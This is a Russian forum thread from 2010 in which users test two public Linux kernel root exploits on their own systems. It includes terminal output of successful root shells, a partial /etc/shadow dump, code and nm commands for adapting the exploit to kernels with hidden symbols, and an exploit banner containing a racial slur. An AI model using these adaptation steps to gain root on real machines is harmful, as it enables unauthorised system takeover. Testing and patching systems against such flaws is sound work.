|
2.25, Demo (??), 13:20, 16/09/2010 [^] [^^] [^^^] [ответить]
| –2 +/– |
Куда доставляет? И к чему там "да" в конце предложения?
| |
|
|
Часть нити удалена модератором |
4.38, Demo (??), 14:29, 16/09/2010 [ответить]
| +6 +/– |
>Вы шутите, правда?
К вам претензий нет. Продолжайте.
| |
|
|
6.53, Demo (??), 17:24, 16/09/2010 [^] [^^] [^^^] [ответить]
| +2 +/– |
А, это вы про так-называемые "лулзы" и проч... Да это же китч, не стоящий ни малейшего внимания.
| |
|
7.60, Samm (??), 19:00, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
Вы негодный, толстый троль. Кстати, фраза robert, you sucks тоже имеет отношение к этому вашему аниме.
| |
|
|
|
|
|
2.46, User294 (ok), 16:07, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
В "боевой" версии эксплойта есть какие-то "лестные" коменты в адрес Ben'а :)
| |
|
|
|
3.6, Аноним (-), 12:22, 16/09/2010 [^] [^^] [^^^] [ответить]
| +2 +/– |
>по-моему это разные эксплойты
да, тот что от hawkes - просто poc. а тот что от acid bitches - боевой варез с обходом селинуксов и прочего.
| |
|
4.48, User294 (ok), 16:12, 16/09/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
>да, тот что от hawkes - просто poc. а тот что от
>acid bitches - боевой варез с обходом селинуксов и прочего.
Судя по стилю сырца исходника, Ac1dB1tch3z отрабатывают свое название на все 120%... :)
| |
|
|
2.5, Аноним (-), 12:20, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
а, сорри гоню.
эксплоит выложен в ответ на публикацию уязвимости by ben hawkes.
| |
|
1.10, аноним (?), 12:44, 16/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +5 +/– |
>Компания RedHat заявила, что ядра, поставляемые в дистрибутивах RHEL 3, 4 и 5 (соответственно и в CentOS), не являются уязвимыми, так как проблемный патч d4d67150 не был принят.
Вот так redhat ненавязчиво показал, кто на самом деле заботится о безопасности, а кто только делает вид и поднимает шум.
| |
|
2.13, svn (??), 12:52, 16/09/2010 [^] [^^] [^^^] [ответить]
| –1 +/– |
>Вот так redhat ненавязчиво показал, кто на самом деле заботится о безопасности, а кто только делает вид и поднимает шум.
Ага, только изменение открывающее эту дыру было сделано сотрудниками redhat!
Намеренно подложили мину тем кто использует ванильное ядро, а сами её обошли?
| |
|
3.18, szh (ok), 13:02, 16/09/2010 [^] [^^] [^^^] [ответить]
| –3 +/– |
>Ага, только изменение открывающее эту дыру было сделано сотрудниками redhat!
>Намеренно ?
В злых намереньях подозревай анонимуса которому отвечаешь, а не сотню разработчиков редхат, что они вошли в сговор с десятком менеджеров (а иначе эта бага пролезла бы и в продукты редхат). Не забывай, люди со временем увольняются из компании, и могут все рассказать.
| |
|
4.24, аноним (?), 13:18, 16/09/2010 [^] [^^] [^^^] [ответить]
| +5 +/– |
Банальный пофигизм. В своих ведрах дыру закрыли, а на ванилу положили. Типа собщество разберется
| |
|
3.19, аноним (?), 13:09, 16/09/2010 [^] [^^] [^^^] [ответить]
| +7 +/– |
>Ага, только изменение открывающее эту дыру было сделано сотрудниками redhat!
Редхат настолько суров, что посылает нафиг даже своих сотрудников, если патч кривой.
| |
|
2.16, szh (ok), 12:59, 16/09/2010 [^] [^^] [^^^] [ответить]
| –6 +/– |
> Вот так redhat ненавязчиво показал, кто на самом деле заботится о безопасности, а кто только делает вид и поднимает шум.
у тебя проблемы, ты не понимаешь где есть логические связи и где их нет.
| |
|
3.21, аноним (?), 13:10, 16/09/2010 [^] [^^] [^^^] [ответить]
| –2 +/– |
>у тебя проблемы, ты не понимаешь где есть логические связи и где их нет.
Ага, значит, намек был понят и бурная эмоциональная реакция имела место быть.
Что ж, жизнь, она суровая. И склонна разрушать розовые фантазии.
| |
|
4.77, szh (ok), 21:24, 16/09/2010 [^] [^^] [^^^] [ответить]
| –1 +/– |
> Ага, значит, намек был понят и бурная эмоциональная реакция имела место быть.
хочешь пофлудить на тему оффтопика, троллик ?
> Что ж, жизнь, она суровая. И склонна разрушать розовые фантазии.
пока что ты активно создаешь розовые фантазии о редхате.
| |
|
3.27, аноним (?), 13:23, 16/09/2010 [^] [^^] [^^^] [ответить]
| +2 +/– |
>у тебя проблемы,
Правда?
>ты не понимаешь где есть логические связи и где их нет.
По-моему, все очевидно.
Редхат действительно заботится о безопасности, и не принимает сомнительные патчи, даже если их написали свои же сотрудники.
А есть дистры, которые не шибко-то беспокоятся о безопасности, но если их раз в пять лет таки удалось выпустить апдейт раньше конкурентов, они превращают это в шоу со свистами, плясками и карнавалами, трубя на каждом углу о своей доблести. Судьба же конкурентов, не успевающих распространить апдейты именно из-за этой свистопляски, наших доблестных борцунов волнует мало.
| |
|
4.41, pva (??), 14:39, 16/09/2010 [^] [^^] [^^^] [ответить]
| –2 +/– |
Редхат использует древние ядра и посему у них этой проблемы нет. Ка бы использовали что-то новое, то имели бы те же проблемы, что и все...
А текст новости написан повоцирующе. Зря.
| |
|
5.47, cryo (ok), 16:10, 16/09/2010 [^] [^^] [^^^] [ответить]
| +2 +/– |
Редхат-ядро вообще сложно сравнивать с ванила-ядром, и, тем более, определять, что свежее.
В рэдхат-ядре встречаются и бэкпорты из свежайших ядер ванилы, но при этом отсутствует многое из того, что давно принято в ванилу, но по каким-то причинам не прошло внутренний тест редхата.
Ключевое слово - продакшин. Редхат старается держать свои ядра в состоянии, пригодном для промышленного применения своей системы.
Да, если сравнивать по кол-ву свистелок и перделок в ядре - рэдхат безнадежно отстал :)
| |
5.43, Аноним (-), 14:53, 16/09/2010 [^] [^^] [^^^] [ответить] | +/– | в эксплоите описаны следующие таргеты struct LSM_rhel known_targets 4 ... большой текст свёрнут, показать | |
|
6.70, Sectoid (??), 19:49, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
>...
>"2.6.18-164.11.1.el5",
>...
>Так что работает оно в редхате с этими ядрами. нету заговора
Подтверждаю, работает. CentOS 5.5.
| |
|
|
|
|
|
1.34, prapor (??), 13:51, 16/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +1 +/– |
syeg % ./robert_you_suck ~/tmp
resolved symbol commit_creds to 0xffffffff81097c70
resolved symbol prepare_kernel_cred to 0xffffffff81097f60
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
sh-4.1# id
uid=0(root) gid=0(root) групи=0(root) контекст=system_u:system_r:kernel_t:s0
sh-4.1# cat /etc/redhat-release
Red Hat Enterprise Linux release 6.0 Beta (Santiago)
sh-4.1#
| |
|
2.61, Michael Shigorin (ok), 19:06, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
ALT (обычный и ovz):
$ ./ABftw
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.32-std-def-alt20.M50P.1
[...]
$$$ 0v3r thr0w f0ps g0v3rnm3nt
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!
$ ./ABftw
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ K3rn3l r3l3as3: 2.6.18-ovz-rhel-alt12
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
!!! N0t a RH3l k3rn3l
!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!
!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l
| |
|
3.64, User294 (ok), 19:20, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
Там в сплойте комент есть что OVZ payload выпилен от скрипткиддей подальше. Это никак не связано с everything failed?
| |
|
4.71, Michael Shigorin (ok), 19:53, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Там в сплойте комент есть что OVZ payload выпилен от скрипткиддей подальше.
Читал. Проверил левоюзером в VE и на HN, выхлоп идентичный.
>Это никак не связано с everything failed?
Нинаю. :)
| |
|
|
|
|
2.40, Аноним (40), 14:36, 16/09/2010 [^] [^^] [^^^] [ответить]
| –4 +/– |
>Собрал. Не работает :(
работать будет только в RHEL!!!
в собачей моче (Gentoo) и в Debian sid не работает - ядра как grsec/pax так и без.
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.32
$$$ prepare_creds->ffffffff81050750
$$$ override_creds->ffffffff81050680
$$$ revert_creds->ffffffff810508b0
$$$ Kernel Credentials detected
!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z
| |
|
3.42, Аноним (40), 14:42, 16/09/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
таки работает на Debian
Linux sindicat 2.6.32 #2 SMP Wed Aug 18 12:00:42 EEST 2010 x86_64 GNU/Linux
$ ./robert_you_suck
resolved symbol commit_creds to 0xffffffff81050920
resolved symbol prepare_kernel_cred to 0xffffffff81050820
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
# id
uid=0(root) gid=0(root) groups=0(root)
#
| |
3.79, slepnoga (??), 21:34, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
>в собачей моче (Gentoo) и в Debian sid не работает - ядра
с мочой удавись от злости :)
slep@mini ~ $ ./a.out
resolved symbol commit_creds to 0xffffffff810651e0
resolved symbol prepare_kernel_cred to 0xffffffff810658d0
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
sh-4.1# id
uid=0(root) gid=0(root) группы=0(root)
sh-4.1# uname -a
Linux mini 2.6.35-gentoo-r5-1.04 #1 SMP PREEMPT Sun Sep 5 04:09:31 EEST 2010 x86_64 Intel(R) Atom(TM) CPU 330 @ 1.60GHz GenuineIntel GNU/Linux
sh-4.1#
| |
|
|
1.39, i (??), 14:30, 16/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
таки не работает inux aquinas 2.6.34-hardened-r1-grsec #1 SMP PREEMPT Tue Jul 13 18:49:32 MSD 2010 x86_64 Intel(R) Core(TM)2 Quad CPU Q9550 @ 2.83GHz GenuineIntel GNU/Linux
exploit@aquinas ~ $ ./robert_you_suck
symbol table not available, aborting!
Process finished
| |
|
2.65, Pentium02 (?), 19:22, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
Сделайте так, например
замените /proc/kallsyms на путь к System.map
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
return 0;
oldstyle = 1;
}
например:
f = fopen("/boot/System.map-genkernel-x86_64-2.6.35-zen2", "r");
if (f == NULL) {
f = fopen("/boot/System.map-genkernel-x86_64-2.6.35-zen2", "r");
if (f == NULL)
return 0;
oldstyle = 1;
}
| |
|
3.84, i (??), 09:41, 17/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
Ура заработало! :))
после чтения System.map из доступного каталога
exploit@aquinas ~ $ ./robert_you_suck
resolved symbol commit_creds to 0xffffffff82058a20
resolved symbol prepare_kernel_cred to 0xffffffff82058700
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
sh-4.0#
sh-4.0# cat /etc/shadow
root:$6$i1aC.........
и все же, kallsyms ksyms и System.map от юзера скрыты:
exploit@aquinas ~ $ ls -l /usr/src/linux/
ls: невозможно открыть каталог /usr/src/linux/: Отказано в доступе
exploit@aquinas ~ $ ls -l /boot/
ls: невозможно открыть каталог /boot/: Отказано в доступе
В данном случае без не большой помощи рута не работало :)
| |
|
4.103, taaroa (ok), 00:47, 21/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
~/tmp% gcc robert_you_suck.c
~/tmp% ./a.out
symbol table not available, aborting!
Process finished
~ra# cp /boot/System.map-zZ-x86_64-2.6.34-hardened-r4 tmp/
~ra# gradm -S
The RBAC system is currently disabled.
~/tmp% cp robert_you_suck.c robert_you_suck2.c && nano -w robert_you_suck2.c && gcc robert_you_suck2.c
~/tmp% ./a.out
resolved symbol commit_creds to 0xffffffff810a6d90
resolved symbol prepare_kernel_cred to 0xffffffff810a7170
mapping at 3f80000000
mmap fault
Process finished
~/tmp% uname -a
Linux taaroa 2.6.34-hardened-r4 #3 SMP Fri Sep 10 21:09:54 KRAST 2010 x86_64 AMD Phenom(tm) II X4 925 Processor AuthenticAMD GNU/Linux
| |
|
|
|
|
2.45, Аноним (-), 15:43, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
>А кто такоей Роберт то?
вы с лора? по ссылками не ходите?
грепните по ссылке по "Robert Swiecki"
| |
|
1.50, hexium (ok), 16:41, 16/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
>> exploit@aquinas ~ $ ./robert_you_suck
>> symbol table not available, aborting!
>> Process finished
Адреса функций найдите в vmlinux и подставьте в код эксплоита. Что-то типа
commit_creds = 0xffffffff8106e760;
prepare_kernel_cred = 0xffffffff8106e5d0;
Уникально для каждой сборки.
Короче, shit happens ;)
| |
|
2.62, Michael Shigorin (ok), 19:13, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
>Адреса функций найдите в vmlinux и подставьте в код эксплоита.
У некоторых /boot 0700, придётся как минимум отдельно заморочиться найти тот же пакет. ;)
| |
|
1.57, Аноним (-), 18:09, 16/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
>>Адреса функций найдите в vmlinux и подставьте в код эксплоита. Что-то типа
>>commit_creds = 0xffffffff8106e760;
>>prepare_kernel_cred = 0xffffffff8106e5d0;
>>Уникально для каждой сборки.
где их там искать?
| |
|
2.74, pavlinux (ok), 21:11, 16/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
>>>Адреса функций найдите в vmlinux и подставьте в код эксплоита. Что-то типа
>>>commit_creds = 0xffffffff8106e760;
>>>prepare_kernel_cred = 0xffffffff8106e5d0;
>>>Уникально для каждой сборки.
>
>где их там искать?
# nm vmlinux | grep -E ' commit_creds| prepare_kernel_cred'
| |
|
3.81, pavlinux (ok), 00:36, 17/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
>>>>Адреса функций найдите в vmlinux и подставьте в код эксплоита. Что-то типа
>>>>commit_creds = 0xffffffff8106e760;
>>>>prepare_kernel_cred = 0xffffffff8106e5d0;
>>>>Уникально для каждой сборки.
>>где их там искать?
># nm vmlinux | grep -E ' commit_creds| prepare_kernel_cred'
Зачем про rm pavlinux потёрли коммент :)
| |
|
|
1.59, i (??), 18:56, 16/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
ну так найдите подставте, на то оно CONFIG_GRKERNSEC_HIDESYM=y в ядре
If you say Y here, getting information on loaded modules, and
displaying all kernel symbols through a syscall will be restricted
to users with CAP_SYS_MODULE. This option will aid in providing a
useful protection against local kernel exploitation of overflows
and arbitrary read/write vulnerabilities.
И кстати вот не харденед ядро тоже не сработало:
$ uname -a
Linux games 2.6.29-gentoo-r5 #1 PREEMPT Mon Jun 1 11:47:47 MSD 2009 x86_64 Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux
$ ./robert_you_suck
resolved symbol commit_creds to 0xffffffff80247d2e
resolved symbol prepare_kernel_cred to 0xffffffff80247e62
mapping at 3f80000000
UID 1611, EUID:1611 GID:1616, EGID:1616
sh-3.2$ cat /etc/shadow
cat: /etc/shadow: Отказано в доступе
sh-3.2$ exit
c^C
| |
1.66, crypt (??), 19:39, 16/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Да... веселые новости пошли... Мне больше всего заинтересовала это место:
This exploit has been tested very thoroughly over the course of the past few years on many many targets.
Thanks to redhat for being nice enough to backport it into early kernel versions
Так бы не нашли и жили бы с этим еще пару лет.
| |
1.73, pavlinux (ok), 21:01, 16/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
pavel@suse64:~> gcc -m32 abftw.c
pavel@suse64:~> ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.32.21
$$$ prepare_creds->ffffffff8105ea90
$$$ override_creds->ffffffff8105ea40
$$$ revert_creds->ffffffff8105ebc0
$$$ Kernel Credentials detected
!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z
А чё должно быть-то?
| |
|
|
3.90, Вова (?), 12:14, 17/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
>а -m32 ты зачем добавил?
эксплойт от эйсид бич иначе не компилируется.
| |
3.92, pavlinux (ok), 13:42, 17/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
>а -m32 ты зачем добавил?
$ cat ABftw.c | sed -n '60,63p';
#ifndef __i386__
#error "r34d th3 c0d3 m0r0n!!# () #"
#else
| |
|
|
1.82, temper (?), 01:27, 17/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Вот этот работает на centos 5.5: http://seclists.org/fulldisclosure/2010/Sep/att-268/ABftw_c.bin
[user@srv src]$ uname -a
Linux srv 2.6.18-164.11.1.el5xen #1 SMP Wed Jan 20 08:06:04 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
[user@srv src]$ id
uid=505(user) gid=506(user) groups=503(admins),506(user)
[user@srv src]$ ./expl
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-164.11.1.el5xen
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: 2.6.18-164.11.1.el5xen #1 SMP Wed Jan 20 08:06:04 EST 2010
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=506(user) groups=503(admins),506(user)
| |
1.85, Humanoid (?), 10:11, 17/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
humanoid@UFO /media/disk $ ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.35-gentoo-r4-1
$$$ prepare_creds->ffffffff81080833
$$$ override_creds->ffffffff8108040c
$$$ revert_creds->ffffffff810805ed
$$$ Kernel Credentials detected
!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z
опять неудача =\ на федоре был, 2 эксплоита мимо, перешёл на генту, опять невезуха...
| |
|
2.86, Humanoid (?), 10:16, 17/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
на серверах, где хоть каким пользователям доступ имеется всё крутиться внутри openvz контейнеров, на хост систему доступ только у админа, так что опять мимо ....
| |
|
3.88, Аноним (-), 11:15, 17/09/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
>на серверах, где хоть каким пользователям доступ имеется всё крутиться внутри openvz
>контейнеров, на хост систему доступ только у админа, так что опять
>мимо ....
Ты про точки слышал? А если бы по ссылкам ходил, то узнал бы, что есть payload для openvz. А то, что у тебя не сработало, так это потому что ты скорее всего ядро 32 от 64 отличить не можешь. Какое у тебя толком не понятно.
| |
|
2.89, Вова (?), 12:13, 17/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
У меня тоже эксплойт от эйсид битч не сработал, но роберт_ю_сак - дал рута.
| |
|
1.94, gg (??), 14:07, 17/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
[hacky@ks310439 ~]$ id
uid=518(hacky) gid=518(hacky) groups=518(hacky)
[hacky@ks310439 ~]$ ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.3.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=518(hacky) groups=518(hacky)
Centos 5.5
| |
|
2.96, аноним (?), 18:32, 17/09/2010 [^] [^^] [^^^] [ответить]
| +/– |
Это никаким местом не workaround. int80 можно вызвать и из 64-битного кода. И 64хбитный robert_you_suck это как бы подтверждает.
| |
|
1.97, bircoph (?), 07:47, 18/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Что-то не понимаю, почему тянут с обновлением мейнстримного ядра?
Я уже давно наложил патчи на 2.6.35.4 и эксплойт больше не работает.
| |
1.98, Аноним (-), 13:35, 18/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
печально
вчера качал с www.kernel.org 2.4.35.4
~ $ uname -r
2.6.35.4
~ $ id -u
1001
~ $ ./1
resolved symbol commit_creds to 0xffffffff81080e10
resolved symbol prepare_kernel_cred to 0xffffffff810812e0
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
# id -u
0
#
| |
1.99, Аноним (99), 15:19, 18/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
seleen:~> uname -a
Linux seleen 2.6.26 #1 SMP PREEMPT Mon May 4 23:54:48 MSD 2009 x86_64 GNU/Linux
seleen:~> ./rober
symbol table not available, aborting!
Process finished
seleen:~> cat /etc/shadow
cat: /etc/shadow: Permission denied
seleen:~>
Как починить?
| |
|
2.100, Аноним (-), 17:44, 18/09/2010 [^] [^^] [^^^] [ответить]
| +1 +/– |
ну вот ванильное починили
$ uname -srvm
Linux 2.6.36-rc4-git4 #1 SMP Sat Sep 18 17:49:22 YEKST 2010 x86_64
$ id -u
1001
$ ./1
resolved symbol commit_creds to 0xffffffff81085780
resolved symbol prepare_kernel_cred to 0xffffffff81085c50
mapping at 3f80000000
UID 1001, EUID:1001 GID:1001, EGID:1001
$ id -u
1001
$
| |
|
1.102, ImPressed (ok), 01:43, 20/09/2010 [ответить] [﹢﹢﹢] [ · · · ]
| +/– |
Гента с последними апдейтами ведра не подвержена уязвимости. Затестил только что.
impressed@satan ~ $ uname -a
Linux satan.net 2.6.35-gentoo-r7-Core2Quad #1 SMP PREEMPT Mon Sep 20 01:48:53 ALMT 2010 x86_64 Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz GenuineIntel GNU/Linux
impressed@satan ~ $ cd Compiler/
impressed@satan ~/Compiler $ ./sploit
resolved symbol commit_creds to 0xffffffff81059460
resolved symbol prepare_kernel_cred to 0xffffffff81059a20
mapping at 3f80000000
UID 1488, EUID:1488 GID:1488, EGID:1488
sh-4.0$
Сплойт лососает тунца, как видно.
Второй тоже не пашет =)
| |
|